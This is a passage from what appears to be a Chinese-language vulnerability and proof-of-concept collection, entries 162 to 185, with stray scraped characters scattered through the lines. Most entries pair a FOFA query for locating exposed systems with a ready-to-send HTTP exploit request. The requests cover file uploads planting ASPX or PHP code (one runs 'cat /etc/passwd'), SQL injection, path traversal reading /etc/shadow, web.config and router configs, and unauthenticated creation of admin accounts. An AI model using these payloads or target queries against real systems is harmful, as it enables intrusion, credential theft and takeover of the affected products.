5 [ _" g; E% P' Q e I</soap:Body>, F2 q3 G H% c% d# X4 e: g
</soap:Envelope>
1 O- o. u( r; d% h5 q* ?; s5 e5 }6 b/ \, V
% W( e7 W5 m, l+ Q# w yhttp://x.x.x.x/dizxdell.aspx# h! Q! G" t' D
5 A' l) U0 ?9 C5 B1 v' ?: o162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
) o7 \# W# C' b% y9 b$ X- {4 DFOFA: app="和丰山海-数字标牌"
7 F7 S! J3 s7 |5 P, h1 y, JPOST /QH.aspx HTTP/1.1
% F, W8 h2 D3 c+ o' _6 t# gHost: x.x.x.x
1 D8 `) u, m4 p, e6 p5 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
" Q. t5 o u0 k* j* e2 JConnection: close
3 E2 X! X- j3 t8 SContent-Length: 583
% j Y- Z: T! q5 E* [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey/ A" U$ f: }9 ]
Accept-Encoding: gzip
; O5 V4 ?5 Q. B o7 e4 q: A$ u# S
------WebKitFormBoundaryeegvclmyurlotuey
: o: R5 I* w4 ^2 L- H& Z' MContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 ]9 x! y) ~" z+ J% f h
Content-Type: application/octet-stream
5 M2 N$ @' ` M$ G7 j8 F6 {! f7 ?5 w1 L
<% response.write("ujidwqfuuqjalgkvrpqy") %>
$ b, Z& O+ A4 x4 t------WebKitFormBoundaryeegvclmyurlotuey
" ~6 \) v! I& A" KContent-Disposition: form-data; name="action", p8 b5 o+ B5 T: [3 A
3 C6 ~! }! S! @+ E& ^upload
( t6 E0 c3 L3 c4 A; R$ F4 u4 k* e; l------WebKitFormBoundaryeegvclmyurlotuey
5 _8 _5 ~$ }* r; t4 RContent-Disposition: form-data; name="responderId"
6 Y0 c, |# x! s( h% g- G! M6 g
- y) f4 R7 w% G5 [. p+ w1 G8 ^ResourceNewResponder
2 M1 ^8 Z" \* K6 ?) X$ v& j5 Q------WebKitFormBoundaryeegvclmyurlotuey
5 |2 X! h2 T" \1 ~% u$ CContent-Disposition: form-data; name="remotePath"
1 z0 L& q' n V1 J0 P: X- A
7 r4 C. V6 G; C& J4 U) f9 }/opt/resources- O" c" }7 x5 a5 _0 c5 t
------WebKitFormBoundaryeegvclmyurlotuey--
6 `# D4 T; v$ @% X
. x3 H! ?9 p7 R8 h# e
1 \3 {" t; Z Thttp://x.x.x.x/opt/resources/kjuhitjgk.aspx f( }; E4 ?" e L/ t: K
3 A5 ?5 [9 q+ J4 D- q4 h ^* {
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传% ~. q- P( b: E
FOFA: icon_hash="-795291075"
: n) p5 _! Y8 Y* \" tPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
/ Y' W, X, W b2 p# j7 lHost: x.x.x.x
8 z2 u1 `- I/ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. |6 p0 `/ h0 L8 O$ M2 z; qConnection: close. M8 W6 p0 I/ S# @
Content-Length: 293
2 m$ Z7 u$ c$ x. p1 M7 V/ F& w! KAccept: */*
; q% `. M! u6 N8 V6 W8 tAccept-Encoding: gzip, deflate. U' b% Z7 |8 H% Z6 V$ h3 R8 k6 w
Accept-Language: zh-CN,zh;q=0.9
9 m+ \4 D r' w, u* d/ iContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod6 _5 o7 \ l- D- R7 j5 M5 z
# b; J4 y" k+ e. {; Z, v/ S------iiqvnofupvhdyrcoqyuujyetjvqgocod, r) A8 Z$ D( N J {
Content-Disposition: form-data; name="name"
8 \' ` S* p. x3 d; x* ^2 J% ^2 T4 |$ d$ l$ i5 w; s% O
1.php
! j ?3 w5 y p7 A Z9 {- Z------iiqvnofupvhdyrcoqyuujyetjvqgocod7 S8 G0 a, ~0 K" d
Content-Disposition: form-data; name="upfile"; filename="1.php"
2 ~) A% ~; ^8 V6 UContent-Type: image/jpeg
, V, D) ^, K! m1 j% u
5 ^! E0 A0 ?6 {) M, }8 A0 f0 yrvjhvbhwwuooyiioxega* C9 ~/ {4 `5 ]- m: k1 g6 }
------iiqvnofupvhdyrcoqyuujyetjvqgocod--+ z3 @8 w4 V3 ?
) l0 C2 A8 U: Q% y
% E* S2 B) ]- D3 Q6 y% E164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ w! b3 O. Z2 M) m. D _
FOFA: title="智慧综合管理平台登入"/ k" Z5 M( U& L7 a& p6 L# s
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.18 h9 W( T; Q; K+ A' q1 W6 P' W! R$ X
Host: x.x.x.x/ a6 [2 c1 _% i( e0 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) @0 H3 Q" I' k" L7 SContent-Length: 288
@" r' ^# J9 B7 mAccept: application/json, text/javascript, */*; q=0.016 F5 {; N. V# G% C! E* K( I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,# n$ B; o' {* K
Connection: close
+ c* Q, p) n! }7 z g9 {Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
C% ^, m3 f' B0 w7 SX-Requested-With: XMLHttpRequest2 R2 \) e6 \, Z% I2 `
Accept-Encoding: gzip) X/ b ?7 o7 \* C
( [4 V v& O1 R9 U2 t
------dqdaieopnozbkapjacdbdthlvtlyl& B K" R/ U [5 d: \ K
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
9 P! d3 J1 }7 y5 G/ gContent-Type: image/jpeg# A% }9 C; e! M5 j3 Q
- Q4 ~3 t! v1 w+ \; }3 D( a<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>, E6 |% m! }7 c- Q, C8 Y* N. Q
------dqdaieopnozbkapjacdbdthlvtlyl--$ W! m' b! Z2 v& z2 J7 e
) {' b$ X, x9 d3 R' E, g
5 ^- F7 ] s9 M- M; ^) O( b
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
N3 J" Q; Q. y4 B3 o
/ C8 ~* ^# S- s; ^165. OrangeHRM 3.3.3 SQL 注入: H" [0 L1 H: ^; S0 W- L4 u
CVE-2024-364287 V! J! [; O2 S2 n
FOFA: app="OrangeHRM-产品"
! s k7 H- H3 zURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
1 K# E/ r) K, N$ ]5 Z5 `) M6 | w* J4 b% P _9 u2 c
$ H! W/ n8 F3 o2 ?, L o+ H3 ~6 g) V3 T166. 中成科信票务管理平台SeatMapHandler SQL注入% T% }/ W/ s; }, f( K
FOFA:body="技术支持:北京中成科信科技发展有限公司"
1 @5 ^# {& Y& N0 t% c! EPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1* e6 ?% S( p$ x! r! Z" g
Host:
+ W" h+ y( M5 @+ WPragma: no-cache
! y" n& C" M8 E8 D- |& T1 vCache-Control: no-cache
! Z: k! T& M! u+ m1 ~Upgrade-Insecure-Requests: 12 F' n, }. d: l( }- X% v. z- v8 }% i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ }% Q" t) C: v3 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 o" D6 U1 Y2 u# G. @Accept-Encoding: gzip, deflate2 ~' M; u R' _( I. B! w+ I M' K" y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- ?* ~7 Q% A+ G5 @0 a
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE% ^( k( P+ B* c- l* M! j
Connection: close& I0 H! y9 `- P5 x. [
Content-Type: application/x-www-form-urlencoded
2 q0 l& {5 D uContent-Length: 89
# L' r# w6 U) E& Y, H
& h$ Z1 V% W# lMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
" s0 |' x/ W4 j4 ?. G- o, Q6 `5 Y0 @' E
- A$ P+ B& \8 j4 k167. 精益价值管理系统 DownLoad.aspx任意文件读取1 F0 w( a0 l9 s. Q! i, q
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
3 k4 V4 a2 y2 I uGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
. G9 t0 p- w8 r1 l7 t$ i4 h( f# A3 QHost:
o0 b; o" K9 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; H# J* |; M4 q" e
Content-Type: application/x-www-form-urlencoded; o* b9 p6 z/ S5 ^0 Z' s3 {( d
Accept-Encoding: gzip, deflate
) w/ g k5 M: g `5 a! Z! nAccept: */*6 k: a2 t+ T! B+ y
Connection: keep-alive2 j; a1 n9 E" L! q# F
( k1 }6 Y. a, m# ?9 [! e
) B# y" ]( H4 ^168. 宏景EHR OutputCode 任意文件读取
7 @1 }& e# h- d1 L3 IFOFA:app="HJSOFT-HCM"* Y- ]* ]# q% y& m3 i3 i
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1+ K# C* ]: T- Y) I
Host: your-ip
* y5 o7 N4 |* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
1 O/ T i1 z3 l- F3 O$ M6 i0 RContent-Type: application/x-www-form-urlencoded
5 d! b$ I) x9 ?3 M! AConnection: close
+ z+ @1 B1 \# O$ Z3 B! u& x/ A- |% ]+ s' ^- P8 z! k# C; l
) G, c1 |& }, ^- Z9 q3 l7 x4 l4 d$ }( r) V6 q/ l
169. 宏景EHR downlawbase SQL注入
3 ?8 t- M. P, x$ gFOFA:app="HJSOFT-HCM"1 Q. C# V' ]6 j5 x y8 [
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
: R* f5 c3 M7 U, t: X0 }Host: your-ip
! U: Q* e' s8 R% D. l* B. v& iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 L4 _! v y4 w. Q
Accept: */*
4 t- B; g/ k8 V/ rAccept-Encoding: gzip, deflate
- Q5 V2 O6 s8 L; hConnection: close& w+ }; ^% F c4 z$ s. e, ~
( s+ h9 P7 r7 j6 g, \; n8 O
0 F% t% O. C$ ?! {1 o5 W+ @7 u& D C$ p) X' Y- ^
170. 宏景EHR DisplayExcelCustomReport 任意文件读取. {) D, t2 F- {* u- j' M- h
FOFA:body="/general/sys/hjaxmanage.js"% i& e. s1 e8 ~; E( D+ q
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.14 z' d! U6 z# R7 G8 q3 z
Host: balalanengliang
) D& ]/ }1 D, Q1 U0 y) ~3 XUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ d3 K: D" N* _) V8 p2 I
Content-Type: application/x-www-form-urlencoded* I) [4 t2 o9 d- ?+ V) N
! o* i, G# z+ z2 t
filename=../webapps/ROOT/WEB-INF/web.xml" n! ^+ M* t4 f' [* m! K/ Z. N5 k
+ g% l3 @" F% n8 |3 p7 l" x2 X$ m7 u
" W7 X2 B5 g2 H* E
171. 通天星CMSV6车载定位监控平台 SQL注入
( [! X9 `/ `4 o0 ^7 y5 kFOFA:body="/808gps/"
- ^* F/ \( s# j0 yGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
% Z( e6 u4 }0 Q$ n) Z! w) Y2 RHost: your-ip6 w( c$ w7 J# j6 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ B: r( _2 E% o" j' G y$ o5 g5 D L6 BAccept: */*: r+ V& t0 p* I4 v5 H' h- `9 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 T L* J- l: o7 D. G
Accept-Encoding: gzip, deflate3 g P7 s6 f4 y/ X& L+ K- j
Connection: close: [ _ W! q4 ~4 [ ?1 Y& b3 b
2 x: p& B C! g0 o' U8 }. K9 `/ {8 y+ s$ g! M
6 T6 y6 j; o" M9 t. f' u1 _ y* A172. DT-高清车牌识别摄像机任意文件读取
1 x4 x. V- g% Y. x# d* l2 pFOFA:app="DT-高清车牌识别摄像机"/ H2 |1 e3 K2 J$ G" i
GET /../../../../etc/passwd HTTP/1.17 a/ X7 @8 e* M* x" C" F- o0 n
Host: your-ip3 V, A9 Y5 y8 l& G; O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. v/ Q- ]& D$ @4 ?7 PAccept-Encoding: gzip, deflate& V* c* [% C$ O; q) |* D, I
Accept: */*
' S: B- i' A: y) }9 DConnection: keep-alive; S5 n3 ?1 B0 f0 E* t% k [% `# |
8 r5 C3 I% Q$ ?5 k& U" D+ [2 i: E! B9 _7 i5 y% d
. K( c( V0 i2 Y: v: X! ]8 N; X
173. Check Point 安全网关任意文件读取
8 E3 E: k3 L0 @- D) `CVE-2024-24919: j: q7 h& K) \6 L' X6 O
FOFA:app="Check_Point-SSL-Network-Extender"
5 W" S3 z) @+ I7 @/ s6 NPOST /clients/MyCRL HTTP/1.1/ d5 W v7 N6 W7 _
Host: your-ip
8 E! e0 I- c) {) l0 `Content-Type: application/x-www-form-urlencoded
9 S6 v+ X1 |) v& W; U5 x
2 q1 A6 i, S8 m8 P5 h2 o4 GaCSHELL/../../../../../../../etc/shadow. w, `: z8 H, m
. t! x* h& @7 k! h" X. Z
7 ^. a T7 t, |- f( K
* t! A: R; w9 I/ Q9 ^174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 f" R, U& B) X1 d1 U
FOFA:app="金和网络-金和OA"
' C% K4 K7 }: ^3 aGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
% d _, x j3 V7 o E" L6 I7 AHost: your-ip
7 a0 r2 r1 h3 a9 x- mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 ~0 Z9 f1 L8 c8 |; \* u( CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& Y# C8 O0 W2 F3 w. V; b( ~1 gAccept-Encoding: gzip, deflate, br
; d7 D% @. ?# Y1 M) V) {8 F' f/ _Accept-Language: zh-CN,zh;q=0.97 }+ Y1 }: H8 w7 ?' `
Connection: close
/ w4 B4 Z: B" v- B. W- M
5 l. B2 u3 H/ s4 O; P# X, e/ P$ o5 \3 L' R6 N P
0 n" f' P+ a7 X: L7 A) [4 _175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ O; I9 N: o* {7 f h8 `+ S
FOFA:app="金和网络-金和OA"
+ L5 c! Q' j4 @% L, NGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
: K8 L3 u1 F& ^7 ?' B0 lHost:6 u( S9 s8 Z; k0 V9 @& V
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 W1 M9 ~8 W* a$ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 _: P( C' k! |7 i Y; KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( A" S# F7 q" q4 S- L3 n
Accept-Encoding: gzip, deflate
C9 Q: U) g" ]1 k a8 M. DConnection: close
1 \/ y) n" f! mUpgrade-Insecure-Requests: 1- D# H3 J; n7 V+ t7 V! X3 ?
( m) x8 n* B# ?9 V6 d, \! M. @/ v5 s' ?. X
176. 电信网关配置管理系统 rewrite.php 文件上传# B$ Q" }+ Q- U# w
FOFA:body="img/login_bg3.png" && body="系统登录"9 r6 W& F' J9 x3 `6 f9 c0 K7 u# ?
POST /manager/teletext/material/rewrite.php HTTP/1.1
/ ]- h1 y& d! r) G# a; M5 Y" ZHost: your-ip. j5 X' P) q$ [# H" N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. `5 I8 t: G7 q1 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT% o- c5 s. p; i; S7 _( J
Connection: close. b( l- S* I, D' @5 k
$ ~4 a3 \/ g5 L% Q------WebKitFormBoundaryOKldnDPT
; h" ?4 j2 ~- b9 DContent-Disposition: form-data; name="tmp_name"; filename="test.php"9 n( I: s& J. Q3 q C, @: F
Content-Type: image/png
' S- E6 c7 ]% a , l0 }# A: g$ _6 j9 j, B* U" T
<?php system("cat /etc/passwd");unlink(__FILE__);?>
' ^: R& p3 u) u------WebKitFormBoundaryOKldnDPT
1 Y( {$ z8 U. ?Content-Disposition: form-data; name="uploadtime"
! `4 u" Q6 K1 I# T# x* p" ?
. r1 a) s; J9 t
/ V; g* k" L8 X' s9 h------WebKitFormBoundaryOKldnDPT--0 r) ^$ e$ F4 |8 u
+ k h/ V) U4 C) t; ?0 O
$ \ L& I5 O0 h3 s$ }6 ^ _# p
# c! s3 s, f f/ D
177. H3C路由器敏感信息泄露% [9 l) e' r" Y' _- X" b- s7 y
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 g' @1 Y- L- q7 N! Y
/userLogin.asp/../actionpolicy_status/../M60.cfg
( a @2 N! U- L5 |3 f Y. n/userLogin.asp/../actionpolicy_status/../GR8300.cfg# S6 ~. J H4 @$ a4 ^" D
/userLogin.asp/../actionpolicy_status/../GR5200.cfg$ {5 q$ d. B7 V$ z# r, C" Y+ s
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
; L; |# ~7 N, O# X: P& Q/userLogin.asp/../actionpolicy_status/../GR2200.cfg
0 V1 R+ W+ j- t, g! Q/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
6 o) V8 y8 z7 Z9 ]/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 a( }6 H7 P. ^1 E! S8 T/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
) c: r5 T( d# T ~) v; e/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg0 C: u9 Q: [+ B1 _
/userLogin.asp/../actionpolicy_status/../ER5200.cfg( g- f; c% G" k% k" j2 @
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
9 s9 G, I: X, A% \3 d" Y# L/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
- M2 N8 ]# T4 H/ r# y/userLogin.asp/../actionpolicy_status/../ER3260.cfg
: g, Z i' o* I; U6 j/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
z0 y7 O# T' _6 }3 i- a/ `/userLogin.asp/../actionpolicy_status/../ER3200.cfg0 S0 C' V3 T8 {. \! ?
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg9 @* y- P. ?6 H. K6 z, N) L
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg. B; [0 R+ {3 r0 B# ?9 f# _2 z* O h0 p2 j
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
" k/ l/ g% t$ v0 E/ \+ @/userLogin.asp/../actionpolicy_status/../ER3100.cfg" b: o/ U6 k& e' ?7 _4 y2 s
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg- B3 R6 Q5 A w0 [9 ]
# k0 v! N! p) }1 F+ S# M+ [
- C; Q& r1 G' d" _6 b# j178. H3C校园网自助服务系统-flexfileupload-任意文件上传, F$ k7 ]. ?$ V* _
FOFA:header="/selfservice"
" o* s4 n3 d8 v$ N3 _POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 q4 r7 a. T+ J' {$ k% ~5 d: G5 g
Host:- n/ `2 [& } U0 E* J# T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% j# q( ]: p8 g# l) D |
Content-Length: 252
8 V3 M6 y5 t% Y" o; S7 ~Accept-Encoding: gzip, deflate
/ M2 t) x- A+ {) I/ q3 r" SConnection: close
1 [* O2 U2 ^9 v4 @: rContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
+ |0 Y+ K, N) e: L5 G, u& ]) r-----------------aqutkea7vvanpqy3rh2l
% U. C, D6 e6 }, {% p# @Content-Disposition: form-data; name="12234.txt"; filename="12234"; x4 C- ^. w7 L" Y+ u! J+ O- r3 w
Content-Type: application/octet-stream% {- e( |7 d& Z: ]3 n
Content-Length: 2559 a0 M! l4 a- ^- W! r# H8 F
" I5 s, ^1 N% Z, m7 M9 G
122349 _6 d9 z; P8 p/ ]/ l
-----------------aqutkea7vvanpqy3rh2l--+ [; ~0 `0 x1 F+ d' R; `7 K# k
4 q: Q7 o3 V5 d) Q! @2 j2 o; ~) o
4 r7 V( D+ S; g: ~
GET /imc/primepush/%2e%2e/flex/12234.txt' z0 C% Y3 r0 r" I/ M2 P: o
$ U Z, b6 ^2 w& n+ G, v# W5 R( `
) _$ p* V2 v1 B1 K9 p2 o3 `5 l179. 建文工程管理系统存在任意文件读取
' F4 ~# w6 W9 yPOST /Common/DownLoad2.aspx HTTP/1.1% f$ x8 n' M1 ~# X, d
Host: {{Hostname}}9 E- g2 M- m% G& |8 r+ d; @
Content-Type: application/x-www-form-urlencoded0 _6 n! I! q0 }8 I" R
User-Agent: Mozilla/5.0
; N8 q# `( e, |1 c- Q! g: v
$ J4 J9 s( n6 B) Q; w5 mpath=../log4net.config&Name=
) T/ d' \- I6 R) a9 V$ {2 [2 Q
& k5 p% G0 j4 c. X, x& n* B) K7 y; a4 x$ v# f
180. 帮管客 CRM jiliyu SQL注入, I3 ^& F: Q* Z: F# N
FOFA:app="帮管客-CRM"
- F: O+ c0 E: y1 D' g9 k vGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
; f3 N% a, s* L1 I1 r" d, O4 ^Host: your-ip
) s9 i" X% O$ a! h. L8 J* ?) wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 }) @4 B9 y7 P! Y" a( _- i) XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' D) k& F0 s- n( p, vAccept-Encoding: gzip, deflate
0 p& P$ B' K! h0 p; m$ q; I2 {Accept-Language: zh-CN,zh;q=0.9
: q/ i% }" F; P5 RConnection: close
& ^, U5 n' i1 P; o5 o0 G4 O
8 I$ K0 `+ |' M; h5 g* v& e$ s# K- I/ u7 k
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入* ?: l7 ?' |( ?: K- T
FOFA:"PDCA/js/_publicCom.js"
! H0 n& a* | W; v8 U+ I: BPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1, E) t. r: j2 v) Q1 n" p$ ]
Host: your-ip( v5 j$ X- N7 o8 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ g: u F, L4 w8 H- AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- }! e2 d5 h# Q) MAccept-Encoding: gzip, deflate, br
2 Z0 a2 ~8 A5 a5 _( ?Accept-Language: zh-CN,zh;q=0.92 A- [/ K# p2 E% d9 } g5 w
Connection: close
( r1 F& G0 y$ t3 c$ _Content-Type: application/x-www-form-urlencoded
; k. W. L0 Y p0 \8 R6 b
$ l& s# W& T2 I6 H, T& f4 {3 f V% ] q
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
2 e6 ~! G/ r' ?0 X. v# y6 r. o
0 {( Q! P( J5 _) g b# v( a8 c; S+ G
' Z8 X- L9 V7 k& ^% ~182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: \+ s/ `8 t9 d O0 \: Y* `4 MFOFA:"PDCA/js/_publicCom.js"9 I5 T& n6 y: h. X. {) }# ]
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.14 g) B. U `5 w: G. }
Host: your-ip
1 d9 Z" n( A; y9 I W3 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 F% ^% m1 \% M% {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ o; t. Z3 X0 i, z2 u! }9 sAccept-Encoding: gzip, deflate, br- N) Y' \' r7 y& q9 a
Accept-Language: zh-CN,zh;q=0.9
1 K: Q. \7 C- [1 l i8 ~0 P) qConnection: close0 i5 v% g3 W% n
Content-Type: application/x-www-form-urlencoded
) l2 C4 A9 b# J- {
$ }/ \$ I2 B% L$ |6 {$ b' A
( C3 t+ o1 U8 k9 C8 Gusername=test1234&pwd=test1234&savedays=12 f2 S% t# D: A* M. V' h+ A
/ b% n& X8 f) v/ h# s
0 R0 G/ b/ H" Q9 D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入" N" ?# D" }7 W9 V' a4 }
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"& f: u1 S: p* n
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
* S2 [! c/ Z2 C' D: \Host: your-ip
1 ^' P: p6 B8 P+ @& V1 A/ iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 b G0 \/ d; q# ]% I+ }3 e
Accept-Charset: utf-8% [% B, C0 q" j4 r
Accept-Encoding: gzip, deflate+ _% T( m2 |! o3 a- I- s
Connection: close5 E1 |; x. o7 m0 |4 |+ p
6 L$ m* w* y: y2 Q, |
9 A3 [# L& x4 h8 A: [- K, }1 ]/ @184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
. X/ O' K j/ nFOFA:server="SunFull-Webs"
! I- b- s, Z e4 Y" [POST /soap/AddUser HTTP/1.1
- q5 H; o" ?; W$ y0 ZHost: your-ip' x$ y9 ^) e9 f0 w. U
Accept-Encoding: gzip, deflate
5 t0 ^ R$ ^0 Z B3 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
0 f: l( V" a% }/ v% O2 d! zAccept: application/xml, text/xml, */*; q=0.01- v$ _% K) a! e
Content-Type: text/xml; charset=utf-8
_# q( ? y/ U8 J. i! qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 R' r$ [) R( o3 V+ a/ _ KX-Requested-With: XMLHttpRequest
0 X, c0 g7 r6 j2 i( x/ w5 x9 v6 k5 n# M+ I/ t& p& O0 l
# d1 z$ c: q& k$ s$ m/ pinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')" ?4 d+ Z% o3 H3 V% d3 V
( ?- D8 A4 J6 n" _
) o! u: ^' B' H7 G8 y! \9 j" S( ^8 m185. 瑞友天翼应用虚拟化系统SQL注入9 U1 ^/ X' K# I: l1 o6 _ n+ y
version < 7.0.5.1" D: Z% w9 e" |- G: _9 ^
FOFA:app="REALOR-天翼应用虚拟化系统"
